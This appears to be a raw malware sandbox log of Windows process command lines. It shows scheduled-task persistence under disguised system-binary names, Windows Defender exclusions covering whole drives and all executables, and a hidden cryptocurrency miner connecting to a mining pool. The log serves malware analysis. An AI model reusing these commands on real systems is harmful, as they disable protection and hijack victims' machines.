"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\winNet\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\winNet\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\es-ES\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\winNet\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\winNet\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /f

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\Prefetch\ReadyBoot\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\es-ES\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\sddsfsdf.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "25272683852682421217750818191465220422-9407692802057673643-1748207935997404968"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3052900611401125956-484756809-446905200-241649272-9487792602012423663809889304"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-271828083-4359111451189210716-1289684993802507662-1364957067213309067794720591"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Idle.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Prefetch\ReadyBoot\explorer.exe'

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-961920636-98148811797934006976321607617681184272034308288-170282153-1921298572"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "17658125455922931561755729633-139957246824629125618701358-956132470-1241721211"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DnAvjBEOV3.bat"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\winNet\wscript.exe

"C:\winNet\wscript.exe"

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\A9jUK9Ae8C.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "9039321941113196100-17247621085065542758533708-1634550024-1281521765-1306536162"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "10458232041309704218-977340461-1780344133-86343893013835761481943200512-1196967907"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-159992700111601998421866752664-655342536248805395706532405-415879957-1927639054"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1868810344-2048948033666806126-43626291359636690543060264-744249752-158698289"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "556020493-644620438739739999-66581829111512784121609637097-815839047-163052952"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1104225558976001055-81118590965226475117268917871455293840-1939095154-500938075"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1678502449-437097632901073378-156327449315826618-12647697901638505465-533490980"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

